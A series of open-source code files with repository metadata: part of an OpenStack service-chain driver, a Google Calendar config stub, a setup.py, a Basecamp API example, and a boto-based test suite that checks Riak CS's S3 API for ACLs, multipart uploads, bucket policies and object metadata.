except Exception:
LOG.exception(_("Service Chain Instance cleanup may not have "
"happened because Heat API request failed "
"while waiting for the stack %(stack)s to be "
"deleted"), {'stack': stack_id})
return
else:
time.sleep(STACK_DELETE_RETRY_WAIT)
stack_delete_retries = stack_delete_retries - 1
if stack_delete_retries == 0:
LOG.warn(_("Resource cleanup for service chain instance is"
" not completed within %(wait)s seconds as "
"deletion of Stack %(stack)s is not completed"),
{'wait': (STACK_DELETE_RETRIES *
STACK_DELETE_RETRY_WAIT),
'stack': stack_id})
return
else:
continue
def _get_instance_by_spec_id(self, context, spec_id):
filters = {'servicechain_spec': [spec_id]}
return context._plugin.get_servicechain_instances(
context._plugin_context, filters)
def _update_servicechain_instance(self, context, sc_instance, newspec):
self._delete_servicechain_instance_stacks(context._plugin_context,
sc_instance['id'])
sc_node_ids = newspec.get('nodes')
self._create_servicechain_instance_stacks(context,
sc_node_ids,
sc_instance,
newspec)
def _delete_chain_stacks_db(self, session, sc_instance_id):
with session.begin(subtransactions=True):
stacks = session.query(ServiceChainInstanceStack
).filter_by(instance_id=sc_instance_id
).all()
for stack in stacks:
session.delete(stack)
def _insert_chain_stack_db(self, session, sc_instance_id, stack_id):
with session.begin(subtransactions=True):
chainstack = ServiceChainInstanceStack(
instance_id=sc_instance_id,
stack_id=stack_id)
session.add(chainstack)
def _get_chain_stacks(self, session, sc_instance_id):
with session.begin(subtransactions=True):
stack_ids = session.query(ServiceChainInstanceStack.stack_id
).filter_by(instance_id=sc_instance_id
).all()
return stack_ids
def _get_resource(self, plugin, context, resource, resource_id):
obj_getter = getattr(plugin, 'get_' + resource)
obj = obj_getter(context, resource_id)
return obj
@property
def _core_plugin(self):
# REVISIT(Magesh): Need initialization method after all
# plugins are loaded to grab and store plugin.
return manager.NeutronManager.get_plugin()
@property
def _grouppolicy_plugin(self):
# REVISIT(Magesh): Need initialization method after all
# plugins are loaded to grab and store plugin.
plugins = manager.NeutronManager.get_service_plugins()
grouppolicy_plugin = plugins.get(pconst.GROUP_POLICY)
if not grouppolicy_plugin:
LOG.error(_("No Grouppolicy service plugin found."))
raise exc.ServiceChainDeploymentError()
return grouppolicy_plugin
class HeatClient:
def __init__(self, context, password=None):
api_version = "1"
endpoint = "%s/%s" % (cfg.CONF.simplechain.heat_uri, context.tenant)
kwargs = {
'token': context.auth_token,
'username': context.user_name,
'password': password
}
self.client = heat_client.Client(api_version, endpoint, **kwargs)
self.stacks = self.client.stacks
def create(self, name, data, parameters=None):
fields = {
'stack_name': name,
'timeout_mins': 10,
'disable_rollback': True,
'password': data.get('password')
}
fields['template'] = data
fields['parameters'] = parameters
return self.stacks.create(**fields)
def delete(self, stack_id):
try:
self.stacks.delete(stack_id)
except heat_exc.HTTPNotFound:
LOG.warn(_("Stack %(stack)s created by service chain driver is "
"not found at cleanup"), {'stack': stack_id})
def get(self, stack_id):
return self.stacks.get(stack_id)
| {
"content_hash": "38439522e5564ff6802eca17ef7c7e07",
"timestamp": "",
"source": "github",
"line_count": 436,
"max_line_length": 79,
"avg_line_length": 39.97935779816514,
"alnum_prop": 0.5768458493488612,
"repo_name": "oneconvergence/group-based-policy",
"id": "1ba54d352fd3c702e8c61ba11b07b8bab9f904dc",
"size": "18004",
"binary": false,
"copies": "1",
"ref": "refs/heads/oneconvergence_service_node_driver",
"path": "gbpservice/neutron/services/servicechain/plugins/msc/drivers/simplechain_driver.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Python",
"bytes": "1741199"
},
{
"name": "Shell",
"bytes": "27976"
}
],
"symlink_target": ""
} |
SCOPE = 'https://www.googleapis.com/auth/calendar'
USER_AGENT = 'GoogleCalendarDisplay/1.0'
CLIENT_ID = ''
CLIENT_SECRET = ''
DEVELOPER_KEY = ''
CALENDAR = ''
TIMEZONE = ''
| {
"content_hash": "a9c6b3ae6090a7e6b56bbb6c694bdcbc",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 50,
"avg_line_length": 21.75,
"alnum_prop": 0.6781609195402298,
"repo_name": "barneyman/gcalMeetingRoom",
"id": "b456935e6b7e63577aba69850341f271ce199911",
"size": "174",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "calendar_config.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "18649"
},
{
"name": "Shell",
"bytes": "255"
}
],
"symlink_target": ""
} |
from distutils.core import setup
setup(
name = 'clavin',
packages = ['clavin'],
version = '0.7',
description = 'A python wrapper for CLAVIN, a Java engine originally built by Berico Technologies',
author = 'Daniel J. Dufour',
author_email = 'daniel.j.dufour@gmail.com',
url = 'https://github.com/danieljdufour/clavin-python',
download_url = 'https://github.com/danieljdufour/clavin-python/tarball/0.7',
keywords = ['geotag'],
classifiers = [],
)
| {
"content_hash": "093833c7a14a1f9abf6d7bf2ccf0feaa",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 101,
"avg_line_length": 33.357142857142854,
"alnum_prop": 0.6916488222698073,
"repo_name": "DanielJDufour/clavin-python",
"id": "15db8d46f5f4f07fcaf1a4a414d6554967285bfc",
"size": "467",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "3279"
}
],
"symlink_target": ""
} |
import elementtree.ElementTree as ET
from basecamp import Basecamp
bc = Basecamp('https://example.basecamphq.com', 'API_KEY')
# or
# bc = Basecamp('https://example.basecamphq.com', 'user', 'password')
# Fetch one todo list from its ID
xml = bc.todo_list(14499317)
items = ET.fromstring(xml).findall('todo-items/todo-item')
# Let's use the ElementTree API to access data via path expressions:
for item in items:
print item.find("content").text | {
"content_hash": "a90f74291bf8dfccc2ec9eea89884c81",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 69,
"avg_line_length": 32.142857142857146,
"alnum_prop": 0.7333333333333333,
"repo_name": "qpleple/basecamp-python-client",
"id": "310f05307872a0815279b87278dbd9a6405dc216",
"size": "504",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "example.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "21222"
}
],
"symlink_target": ""
} |
import os, httplib, json, unittest, uuid, md5
from cStringIO import StringIO
from file_generator import FileGenerator
from boto.exception import S3ResponseError
from boto.s3.connection import S3Connection, OrdinaryCallingFormat
from boto.s3.key import Key
from boto.utils import compute_md5
import boto
def setup_auth_scheme():
auth_mech=os.environ.get('CS_AUTH', 'auth-v2')
if not boto.config.has_section('s3'):
boto.config.add_section('s3')
if auth_mech == 'auth-v4':
setup_auth_v4()
else:
setup_auth_v2()
def setup_auth_v4():
print('Use AWS Version 4 authentication')
if not boto.config.get('s3', 'use-sigv4'):
boto.config.set('s3', 'use-sigv4', 'True')
def setup_auth_v2():
print('Use AWS Version 2 authentication')
if not boto.config.get('s3', 'use-sigv4'):
boto.config.set('s3', 'use-sigv4', '')
setup_auth_scheme()
def create_user(host, port, name, email):
url = '/riak-cs/user'
body = json.dumps({"email": email, "name": name})
conn = httplib.HTTPConnection(host, port)
headers = {"Content-Type": "application/json"}
conn.request("POST", url, body, headers)
response = conn.getresponse()
data = response.read()
conn.close()
return json.loads(data)
# Take a boto 'Key' and returns a hex
# digest of the md5 (calculated by actually
# retrieving the bytes and calculating the md5)
def md5_from_key(boto_key):
m = md5.new()
for byte in boto_key:
m.update(byte)
return m.hexdigest()
# `parts_list` should be a list of file-like objects
def upload_multipart(bucket, key_name, parts_list, metadata={}, policy=None):
upload = bucket.initiate_multipart_upload(key_name, metadata=metadata,
policy=policy)
for index, val in enumerate(parts_list):
upload.upload_part_from_file(val, index + 1)
result = upload.complete_upload()
return upload, result
class S3ApiVerificationTestBase(unittest.TestCase):
host="127.0.0.1"
try:
port=int(os.environ['CS_HTTP_PORT'])
except KeyError:
port=8080
user1 = None
user2 = None
SimpleAcl = "<AccessControlPolicy>" + \
"<Owner>" + \
"<ID>%s</ID>" + \
"<DisplayName>%s</DisplayName>" + \
"</Owner>" + \
"<AccessControlList>" + \
"<Grant>" + \
"<Grantee xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:type=\"CanonicalUser\">" + \
"<ID>%s</ID>" + \
"<DisplayName>%s</DisplayName>" + \
"</Grantee>" + \
"<Permission>%s</Permission>" + \
"</Grant>" + \
"</AccessControlList>" + \
"</AccessControlPolicy>"
PublicReadAcl = "<AccessControlPolicy>" + \
"<Owner>" + \
"<ID>%s</ID>" + \
"<DisplayName>%s</DisplayName>" + \
"</Owner>" + \
"<AccessControlList>" + \
"<Grant>" + \
"<Grantee xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:type=\"Group\">" + \
"<URI>http://acs.amazonaws.com/groups/global/AllUsers</URI>" + \
"</Grantee>" + \
"<Permission>READ</Permission>" + \
"</Grant>" + \
"<Grant>" + \
"<Grantee xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:type=\"CanonicalUser\">" + \
"<ID>%s</ID>" + \
"<DisplayName>%s</DisplayName>" + \
"</Grantee>" + \
"<Permission>%s</Permission>" + \
"</Grant>" + \
"</AccessControlList>" + \
"</AccessControlPolicy>"
def make_connection(self, user):
return S3Connection(user['key_id'], user['key_secret'], is_secure=False,
host="s3.amazonaws.com", debug=False,
proxy="127.0.0.1", proxy_port=self.port,
calling_format=OrdinaryCallingFormat() )
@classmethod
def setUpClass(cls):
# Create test user so credentials don't have to be updated
# for each test setup.
# TODO: Once changes are in place so users can be deleted, use
# userX@example.me for email addresses and clean up at the end of
# the test run.
cls.maxDiff = 10000000000
cls.user1 = create_user(cls.host, cls.port, "user1", str(uuid.uuid4()) + "@example.me")
cls.user2 = create_user(cls.host, cls.port, "user2", str(uuid.uuid4()) + "@example.me")
cls.bucket_name = str(uuid.uuid4())
cls.key_name = str(uuid.uuid4())
cls.data = file("/dev/urandom").read(1024)
def defaultAcl(self, user):
return self.SimpleAcl % (user['id'], user['display_name'], user['id'], user['display_name'], 'FULL_CONTROL')
def prAcl(self, user):
return self.PublicReadAcl % (user['id'], user['display_name'], user['id'], user['display_name'], 'FULL_CONTROL')
def setUp(self):
self.conn = self.make_connection(self.user1)
class BasicTests(S3ApiVerificationTestBase):
def test_auth(self):
bad_user = json.loads('{"email":"baduser@example.me","display_name":"baduser","name":"user1","key_id":"bad_key","key_secret":"BadSecret","id":"bad_canonical_id"}')
conn = self.make_connection(bad_user)
self.assertRaises(S3ResponseError, conn.get_canonical_user_id)
def test_auth_weird_query_param(self):
bucket = self.conn.create_bucket(self.bucket_name)
query_args = 'foo=bar%20baz'
response = bucket.connection.make_request('GET', bucket.name, "notfound",
query_args=query_args)
body = response.read()
boto.log.debug(body)
if response.status != 404:
raise bucket.connection.provider.storage_response_error(
response.status, response.reason, body)
def test_create_bucket(self):
self.conn.create_bucket(self.bucket_name)
self.assertIn(self.bucket_name,
[b.name for b in self.conn.get_all_buckets()])
def test_put_object(self):
bucket = self.conn.create_bucket(self.bucket_name)
k = Key(bucket)
k.key = self.key_name
k.set_contents_from_string(self.data)
self.assertEqual(k.get_contents_as_string(), self.data)
self.assertIn(self.key_name,
[k.key for k in bucket.get_all_keys()])
def test_put_object_with_trailing_slash(self):
bucket = self.conn.create_bucket(self.bucket_name)
key_name_with_slash = self.key_name + "/"
k = Key(bucket)
k.key = key_name_with_slash
k.set_contents_from_string(self.data)
self.assertEqual(k.get_contents_as_string(), self.data)
self.assertIn(key_name_with_slash,
[k.key for k in bucket.get_all_keys()])
def test_delete_object(self):
bucket = self.conn.create_bucket(self.bucket_name)
k = Key(bucket)
k.key = self.key_name
k.delete()
self.assertNotIn(self.key_name,
[k.key for k in bucket.get_all_keys()])
def test_delete_objects(self):
bucket = self.conn.create_bucket(self.bucket_name)
keys = ['0', '1', u'Unicodeあいうえお', '2', 'multiple spaces']
keys.sort()
for key in keys:
k = Key(bucket)
k.key = key
k.set_contents_from_string(key)
all_keys = [k.key for k in bucket.get_all_keys()]
all_keys.sort()
self.assertEqual(keys, all_keys)
result = bucket.delete_keys(keys)
self.assertEqual(keys, [k.key for k in result.deleted])
self.assertEqual([], result.errors)
result = bucket.delete_keys(['nosuchkeys'])
self.assertEqual([], result.errors)
self.assertEqual(['nosuchkeys'], [k.key for k in result.deleted])
all_keys = [k.key for k in bucket.get_all_keys()]
self.assertEqual([], all_keys)
def test_delete_bucket(self):
bucket = self.conn.get_bucket(self.bucket_name)
bucket.delete()
self.assertNotIn(self.bucket_name,
[b.name for b in self.conn.get_all_buckets()])
def test_get_bucket_acl(self):
bucket = self.conn.create_bucket(self.bucket_name)
self.assertEqual(bucket.get_acl().to_xml(), self.defaultAcl(self.user1))
def test_set_bucket_acl(self):
bucket = self.conn.get_bucket(self.bucket_name)
bucket.set_canned_acl('public-read')
self.assertEqual(bucket.get_acl().to_xml(), self.prAcl(self.user1))
def test_get_object_acl(self):
bucket = self.conn.create_bucket(self.bucket_name)
k = Key(bucket)
k.key = self.key_name
k.set_contents_from_string(self.data)
self.assertEqual(k.get_contents_as_string(), self.data)
self.assertEqual(k.get_acl().to_xml(), self.defaultAcl(self.user1))
def test_set_object_acl(self):
bucket = self.conn.create_bucket(self.bucket_name)
k = Key(bucket)
k.key = self.key_name
k.set_canned_acl('public-read')
self.assertEqual(k.get_acl().to_xml(), self.prAcl(self.user1))
class MultiPartUploadTests(S3ApiVerificationTestBase):
def multipart_md5_helper(self, parts, key_suffix=u''):
key_name = unicode(str(uuid.uuid4())) + key_suffix
stringio_parts = [StringIO(p) for p in parts]
expected_md5 = md5.new(''.join(parts)).hexdigest()
bucket = self.conn.create_bucket(self.bucket_name)
upload, result = upload_multipart(bucket, key_name, stringio_parts)
key = Key(bucket, key_name)
actual_md5 = md5_from_key(key)
self.assertEqual(expected_md5, actual_md5)
self.assertEqual(key_name, result.key_name)
return upload, result
def test_small_strings_upload_1(self):
parts = ['this is part one', 'part two is just a rewording',
'surprise that part three is pretty much the same',
'and the last part is number four']
self.multipart_md5_helper(parts)
def test_small_strings_upload_2(self):
parts = ['just one lonely part']
self.multipart_md5_helper(parts)
def test_small_strings_upload_3(self):
parts = [str(uuid.uuid4()) for _ in xrange(100)]
self.multipart_md5_helper(parts)
def test_small_strings_upload_4(self):
parts = [str(uuid.uuid4()) for _ in xrange(20)]
self.multipart_md5_helper(parts)
def test_acl_is_set(self):
parts = [str(uuid.uuid4()) for _ in xrange(5)]
key_name = str(uuid.uuid4())
stringio_parts = [StringIO(p) for p in parts]
expected_md5 = md5.new(''.join(parts)).hexdigest()
bucket = self.conn.create_bucket(self.bucket_name)
upload = upload_multipart(bucket, key_name, stringio_parts,
policy='public-read')
key = Key(bucket, key_name)
actual_md5 = md5_from_key(key)
self.assertEqual(expected_md5, actual_md5)
self.assertEqual(key.get_acl().to_xml(), self.prAcl(self.user1))
def test_standard_storage_class(self):
# Test for bug reported in
# https://github.com/basho/riak_cs/pull/575
bucket = self.conn.create_bucket(self.bucket_name)
key_name = 'test_standard_storage_class'
_never_finished_upload = bucket.initiate_multipart_upload(key_name)
uploads = list(bucket.list_multipart_uploads())
for u in uploads:
self.assertEqual(u.storage_class, 'STANDARD')
self.assertTrue(True)
def test_upload_japanese_key(self):
parts = ['this is part one', 'part two is just a rewording',
'surprise that part three is pretty much the same',
'and the last part is number four']
self.multipart_md5_helper(parts, key_suffix=u'日本語サフィックス')
def test_list_japanese_key(self):
bucket = self.conn.create_bucket(self.bucket_name)
key_name = u'test_日本語キーのリスト'
_never_finished_upload = bucket.initiate_multipart_upload(key_name)
uploads = list(bucket.list_multipart_uploads())
for u in uploads:
self.assertEqual(u.key_name, key_name)
def one_kb_string():
"Return a 1KB string of all a's"
return ''.join(['a' for _ in xrange(1024)])
def kb_gen_fn(num_kilobytes):
s = one_kb_string()
def fn():
return (s for _ in xrange(num_kilobytes))
return fn
def kb_file_gen(num_kilobytes):
gen_fn = kb_gen_fn(num_kilobytes)
return FileGenerator(gen_fn, num_kilobytes * 1024)
def mb_file_gen(num_megabytes):
return kb_file_gen(num_megabytes * 1024)
def md5_from_file(file_object):
m = md5.new()
update_md5_from_file(m, file_object)
return m.hexdigest()
def md5_from_files(file_objects):
"note the plural"
m = md5.new()
for f in file_objects:
update_md5_from_file(m, f)
return m.hexdigest()
def update_md5_from_file(md5_object, file_object):
"Helper function for calculating the hex md5 of a file-like object"
go = True
while go:
byte = file_object.read(8196)
if byte:
md5_object.update(byte)
else:
go = False
return md5_object
def remove_double_quotes(string):
"remove double quote from a string"
return string.replace('"', '')
class FileGenTest(unittest.TestCase):
def test_read_twice(self):
""" Read 2KB file and reset (seek to the head) and re-read 2KB """
num_kb = 2
f = kb_file_gen(num_kb)
first1 = f.read(1024)
self.assertEqual(1024, len(first1))
first2 = f.read(1024)
self.assertEqual(1024, len(first2))
self.assertEqual(2048, f.pos)
self.assertEqual('', f.read(1))
self.assertEqual('', f.read(1))
self.assertEqual(2048, f.pos)
f.seek(0)
self.assertEqual(0, f.pos)
second1 = f.read(1024)
self.assertEqual(1024, len(first1))
second2 = f.read(1024)
self.assertEqual(1024, len(second2))
self.assertEqual(2048, f.pos)
self.assertEqual('', f.read(1))
self.assertEqual('', f.read(1))
class LargerFileUploadTest(S3ApiVerificationTestBase):
"Larger, regular key uploads"
def upload_helper(self, num_kilobytes):
key_name = str(uuid.uuid4())
bucket = self.conn.create_bucket(self.bucket_name)
md5_expected = md5_from_file(kb_file_gen(num_kilobytes))
file_obj = kb_file_gen(num_kilobytes)
key = Key(bucket, key_name)
key.set_contents_from_file(file_obj,
md5=key.get_md5_from_hexdigest(md5_expected))
self.assertEqual(md5_expected, remove_double_quotes(key.etag))
def test_1kb(self):
return self.upload_helper(1)
def test_2kb(self):
return self.upload_helper(2)
def test_256kb(self):
return self.upload_helper(256)
def test_512kb(self):
return self.upload_helper(512)
def test_1mb(self):
return self.upload_helper(1 * 1024)
def test_4mb(self):
return self.upload_helper(4 * 1024)
def test_8mb(self):
return self.upload_helper(8 * 1024)
def test_16mb(self):
return self.upload_helper(16 * 1024)
def test_32mb(self):
return self.upload_helper(32 * 1024)
class LargerMultipartFileUploadTest(S3ApiVerificationTestBase):
"""
Larger, multipart file uploads - to pass this test,
requires '{enforce_multipart_part_size, false},' entry at riak_cs's app.config
"""
def upload_parts_helper(self, zipped_parts_and_md5s, expected_md5):
key_name = str(uuid.uuid4())
bucket = self.conn.create_bucket(self.bucket_name)
upload = bucket.initiate_multipart_upload(key_name)
key = Key(bucket, key_name)
for idx, (part, md5_of_part) in enumerate(zipped_parts_and_md5s):
upload.upload_part_from_file(part, idx + 1,
md5=key.get_md5_from_hexdigest(md5_of_part))
upload.complete_upload()
actual_md5 = md5_from_key(key)
self.assertEqual(expected_md5, actual_md5)
def from_mb_list(self, mb_list):
md5_list = [md5_from_file(mb_file_gen(m)) for m in mb_list]
expected_md5 = md5_from_files([mb_file_gen(m) for m in mb_list])
parts = [mb_file_gen(m) for m in mb_list]
self.upload_parts_helper(zip(parts, md5_list), expected_md5)
def test_upload_1(self):
mb_list = [5, 6, 5, 7, 8, 9]
self.from_mb_list(mb_list)
def test_upload_2(self):
mb_list = [10, 11, 5, 7, 9, 14, 12]
self.from_mb_list(mb_list)
def test_upload_3(self):
mb_list = [15, 14, 13, 12, 11, 10]
self.from_mb_list(mb_list)
class UnicodeNamedObjectTest(S3ApiVerificationTestBase):
''' test to check unicode object name works '''
utf8_key_name = u"utf8ファイル名.txt"
# ^^^^^^^^^ filename in Japanese
def test_unicode_object(self):
bucket = self.conn.create_bucket(self.bucket_name)
k = Key(bucket)
k.key = UnicodeNamedObjectTest.utf8_key_name
k.set_contents_from_string(self.data)
self.assertEqual(k.get_contents_as_string(), self.data)
self.assertIn(UnicodeNamedObjectTest.utf8_key_name,
[obj.key for obj in bucket.list()])
def test_delete_object(self):
bucket = self.conn.create_bucket(self.bucket_name)
k = Key(bucket)
k.key = UnicodeNamedObjectTest.utf8_key_name
k.delete()
self.assertNotIn(UnicodeNamedObjectTest.utf8_key_name,
[obj.key for obj in bucket.list()])
class BucketPolicyTest(S3ApiVerificationTestBase):
"test bucket policy"
def test_no_policy(self):
bucket = self.conn.create_bucket(self.bucket_name)
bucket.delete_policy()
try: bucket.get_policy()
except S3ResponseError: pass
else: self.fail()
def create_bucket_and_set_policy(self, policy_template):
bucket = self.conn.create_bucket(self.bucket_name)
bucket.delete_policy()
policy = policy_template % bucket.name
bucket.set_policy(policy, headers={'content-type':'application/json'})
return bucket
def test_put_policy_invalid_ip(self):
policy_template = '''
{"Version":"2008-10-17","Statement":[{"Sid":"Stmtaaa","Effect":"Allow","Principal":"*","Action":["s3:GetObjectAcl","s3:GetObject"],"Resource":"arn:aws:s3:::%s/*","Condition":{"IpAddress":{"aws:SourceIp":"0"}}}]}
'''
try:
self.create_bucket_and_set_policy(policy_template)
except S3ResponseError as e:
self.assertEqual(e.status, 400)
self.assertEqual(e.reason, 'Bad Request')
def test_put_policy(self):
### old version name
policy_template = '''
{"Version":"2008-10-17","Statement":[{"Sid":"Stmtaaa","Effect":"Allow","Principal":"*","Action":["s3:GetObjectAcl","s3:GetObject"],"Resource":"arn:aws:s3:::%s/*","Condition":{"IpAddress":{"aws:SourceIp":"127.0.0.1/32"}}}]}
'''
bucket = self.create_bucket_and_set_policy(policy_template)
got_policy = bucket.get_policy()
self.assertEqual(policy_template % bucket.name , got_policy)
def test_put_policy_2(self):
### new version name, also regression of #911
policy_template = '''
{"Version":"2012-10-17","Statement":[{"Sid":"Stmtaaa","Effect":"Allow","Principal":"*","Action":["s3:GetObjectAcl","s3:GetObject"],"Resource":"arn:aws:s3:::%s/*","Condition":{"IpAddress":{"aws:SourceIp":"127.0.0.1/32"}}}]}
'''
bucket = self.create_bucket_and_set_policy(policy_template)
got_policy = bucket.get_policy()
self.assertEqual(policy_template % bucket.name, got_policy)
def test_put_policy_3(self):
policy_template = '''
{"Version":"somebadversion","Statement":[{"Sid":"Stmtaaa","Effect":"Allow","Principal":"*","Action":["s3:GetObjectAcl","s3:GetObject"],"Resource":"arn:aws:s3:::%s/*","Condition":{"IpAddress":{"aws:SourceIp":"127.0.0.1/32"}}}]}
'''
try:
self.create_bucket_and_set_policy(policy_template)
except S3ResponseError as e:
self.assertEqual(e.status, 400)
self.assertEqual(e.reason, 'Bad Request')
def test_ip_addr_policy(self):
policy_template = '''
{"Version":"2008-10-17","Statement":[{"Sid":"Stmtaaa","Effect":"Deny","Principal":"*","Action":["s3:GetObject"],"Resource":"arn:aws:s3:::%s/*","Condition":{"IpAddress":{"aws:SourceIp":"%s"}}}]}
''' % ('%s', self.host)
bucket = self.create_bucket_and_set_policy(policy_template)
key_name = str(uuid.uuid4())
key = Key(bucket, key_name)
key.set_contents_from_string(self.data)
bucket.list()
try:
key.get_contents_as_string()
self.fail()
except S3ResponseError as e:
self.assertEqual(e.status, 404)
self.assertEqual(e.reason, 'Object Not Found')
policy = '''
{"Version":"2008-10-17","Statement":[{"Sid":"Stmtaaa","Effect":"Allow","Principal":"*","Action":["s3:GetObject"],"Resource":"arn:aws:s3:::%s/*","Condition":{"IpAddress":{"aws:SourceIp":"%s"}}}]}
''' % (bucket.name, self.host)
self.assertTrue(bucket.set_policy(policy, headers={'content-type':'application/json'}))
key.get_contents_as_string() ## throws nothing
def test_invalid_transport_addr_policy(self):
bucket = self.conn.create_bucket(self.bucket_name)
key_name = str(uuid.uuid4())
key = Key(bucket, key_name)
key.set_contents_from_string(self.data)
## anyone may GET this object
policy = '''
{"Version":"2008-10-17","Statement":[{"Sid":"Stmtaaa0","Effect":"Allow","Principal":"*","Action":["s3:GetObject"],"Resource":"arn:aws:s3:::%s/*","Condition":{"Bool":{"aws:SecureTransport":wat}}}]}
''' % bucket.name
try:
bucket.set_policy(policy, headers={'content-type':'application/json'})
except S3ResponseError as e:
self.assertEqual(e.status, 400)
self.assertEqual(e.reason, 'Bad Request')
def test_transport_addr_policy(self):
bucket = self.conn.create_bucket(self.bucket_name)
key_name = str(uuid.uuid4())
key = Key(bucket, key_name)
key.set_contents_from_string(self.data)
## anyone may GET this object
policy = '''
{"Version":"2008-10-17","Statement":[{"Sid":"Stmtaaa0","Effect":"Allow","Principal":"*","Action":["s3:GetObject"],"Resource":"arn:aws:s3:::%s/*","Condition":{"Bool":{"aws:SecureTransport":false}}}]}
''' % bucket.name
self.assertTrue(bucket.set_policy(policy, headers={'content-type':'application/json'}))
key.get_contents_as_string()
## policy accepts anyone who comes with http
conn = httplib.HTTPConnection(self.host, self.port)
headers = { "Host" : "%s.s3.amazonaws.com" % bucket.name }
conn.request('GET', ("/%s" % key_name) , None, headers)
response = conn.getresponse()
self.assertEqual(response.status, 200)
self.assertEqual(response.read(), key.get_contents_as_string())
## anyone without https may not do any operation
policy = '''
{"Version":"2008-10-17","Statement":[{"Sid":"Stmtaaa0","Effect":"Deny","Principal":"*","Action":"*","Resource":"arn:aws:s3:::%s/*","Condition":{"Bool":{"aws:SecureTransport":false}}}]}
''' % bucket.name
self.assertTrue(bucket.set_policy(policy, headers={'content-type':'application/json'}))
## policy accepts anyone who comes with http
conn = httplib.HTTPConnection(self.host, self.port)
headers = { "Host" : "%s.s3.amazonaws.com" % bucket.name }
conn.request('GET', ("/%s" % key_name) , None, headers)
response = conn.getresponse()
self.assertEqual(response.status, 403)
self.assertEqual(response.reason, 'Forbidden')
class MultipartUploadTestsUnderPolicy(S3ApiVerificationTestBase):
def test_small_strings_upload_1(self):
bucket = self.conn.create_bucket(self.bucket_name)
parts = ['this is part one', 'part two is just a rewording',
'surprise that part three is pretty much the same',
'and the last part is number four']
stringio_parts = [StringIO(p) for p in parts]
expected_md5 = md5.new(''.join(parts)).hexdigest()
key_name = str(uuid.uuid4())
key = Key(bucket, key_name)
## anyone may PUT this object
policy = '''
{"Version":"2008-10-17","Statement":[{"Sid":"Stmtaaa0","Effect":"Allow","Principal":"*","Action":["s3:PutObject"],"Resource":"arn:aws:s3:::%s/*","Condition":{"Bool":{"aws:SecureTransport":false}}}]}
''' % bucket.name
self.assertTrue(bucket.set_policy(policy, headers={'content-type':'application/json'}))
upload = upload_multipart(bucket, key_name, stringio_parts)
actual_md5 = md5_from_key(key)
self.assertEqual(expected_md5, actual_md5)
## anyone without https may not do any operation
policy = '''
{"Version":"2008-10-17","Statement":[{"Sid":"Stmtaaa0","Effect":"Deny","Principal":"*","Action":["s3:PutObject"],"Resource":"arn:aws:s3:::%s/*","Condition":{"Bool":{"aws:SecureTransport":false}}}]}
''' % bucket.name
self.assertTrue(bucket.set_policy(policy, headers={'content-type':'application/json'}))
try:
upload = upload_multipart(bucket, key_name, stringio_parts)
self.fail()
except S3ResponseError as e:
self.assertEqual(e.status, 403)
self.assertEqual(e.reason, 'Forbidden')
class ObjectMetadataTest(S3ApiVerificationTestBase):
"Test object metadata, e.g. Content-Encoding, x-amz-meta-*, for PUT/GET"
metadata = {
"Content-Disposition": 'attachment; filename="metaname.txt"',
"Content-Encoding": 'identity',
"Cache-Control": "max-age=3600",
"Expires": "Tue, 19 Jan 2038 03:14:07 GMT",
"mtime": "1364742057",
"UID": "0",
"with-hypen": "1",
"space-in-value": "abc xyz"}
updated_metadata = {
"Content-Disposition": 'attachment; filename="newname.txt"',
"Cache-Control": "private",
"Expires": "Tue, 19 Jan 2038 03:14:07 GMT",
"mtime": "2222222222",
"uid": "0",
"space-in-value": "ABC XYZ",
"new-entry": "NEW"}
def test_normal_object_metadata(self):
key_name = str(uuid.uuid4())
bucket = self.conn.create_bucket(self.bucket_name)
key = Key(bucket, key_name)
for k,v in self.metadata.items():
key.set_metadata(k, v)
key.set_contents_from_string("test_normal_object_metadata")
self.assert_metadata(bucket, key_name)
self.change_metadata(bucket, key_name)
self.assert_updated_metadata(bucket, key_name)
def test_mp_object_metadata(self):
key_name = str(uuid.uuid4())
bucket = self.conn.create_bucket(self.bucket_name)
upload = upload_multipart(bucket, key_name, [StringIO("part1")],
metadata=self.metadata)
self.assert_metadata(bucket, key_name)
self.change_metadata(bucket, key_name)
self.assert_updated_metadata(bucket, key_name)
def assert_metadata(self, bucket, key_name):
key = Key(bucket, key_name)
key.get_contents_as_string()
self.assertEqual(key.content_disposition,
'attachment; filename="metaname.txt"')
self.assertEqual(key.content_encoding, "identity")
self.assertEqual(key.cache_control, "max-age=3600")
# TODO: Expires header can be accessed by boto?
# self.assertEqual(key.expires, "Tue, 19 Jan 2038 03:14:07 GMT")
self.assertEqual(key.get_metadata("mtime"), "1364742057")
self.assertEqual(key.get_metadata("uid"), "0")
self.assertEqual(key.get_metadata("with-hypen"), "1")
self.assertEqual(key.get_metadata("space-in-value"), "abc xyz")
# x-amz-meta-* headers should be normalized to lowercase
self.assertEqual(key.get_metadata("Mtime"), None)
self.assertEqual(key.get_metadata("MTIME"), None)
self.assertEqual(key.get_metadata("Uid"), None)
self.assertEqual(key.get_metadata("UID"), None)
self.assertEqual(key.get_metadata("With-Hypen"), None)
self.assertEqual(key.get_metadata("Space-In-Value"), None)
def change_metadata(self, bucket, key_name):
key = Key(bucket, key_name)
key.copy(bucket.name, key_name, self.updated_metadata)
def assert_updated_metadata(self, bucket, key_name):
key = Key(bucket, key_name)
key.get_contents_as_string()
# unchanged
self.assertEqual(key.get_metadata("uid"), "0")
# updated
self.assertEqual(key.content_disposition,
'attachment; filename="newname.txt"')
self.assertEqual(key.cache_control, "private")
self.assertEqual(key.get_metadata("mtime"), "2222222222")
self.assertEqual(key.get_metadata("space-in-value"), "ABC XYZ")
# removed
self.assertEqual(key.content_encoding, None)
self.assertEqual(key.get_metadata("with-hypen"), None)
# inserted
